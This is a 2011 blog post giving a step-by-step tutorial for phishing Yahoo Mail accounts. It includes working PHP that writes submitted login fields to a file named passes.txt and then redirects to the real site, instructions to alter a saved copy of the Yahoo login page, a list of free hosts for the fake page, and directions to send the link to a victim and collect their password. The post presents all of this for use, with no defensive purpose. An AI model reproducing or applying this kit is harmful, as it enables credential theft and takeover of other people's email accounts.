Tuesday, October 25, 2011

Hacking Yahoo Mail with Phishing



Step 1:
First of all open notepad and paste the following code:
header("Location: http://www.yahoomail.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
 {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
And save this file as xtreme.php

Step 2:
Tip: use opera browser for best results.
1.Goto your browser open www.yahoomail.com.
2.Now save this yahoomail page on the desktop.
3.Open this saved page with notepad or wordpad.
Now keep your eyes open for the next step...;)
4.Press ctrl+f and find the word "action"(ofcourse without double quotes).
5.Select the following code





and replace with






And save the file as index.htm Now your phishing page is ready.

STEP 3:
Upload both files to any of these free webhost sites:

www.yourfreehosting.net

www.drivehq.com

www.110mb.com

www.t35.com

www.esmartstart.com

Step 4: Now, send this phisher link (index.html link) to your victim and make him login to his Yahoo account using your sent Phisher.


Step 5: Once he logs in to his Yahoo account using Phisher, all his typed Yahoo id and password is stored in “passes.txt”. This file is created in your webhost control panel as shown. If you don’t get passes.txt, try refreshing your page .Once you get passes.txt, you get Yahoo password and can easily use it for hacking Yahoo account.
Step 6: Now, open passes.txt to get hacked Yahoo id and password.



No comments:

Post a Comment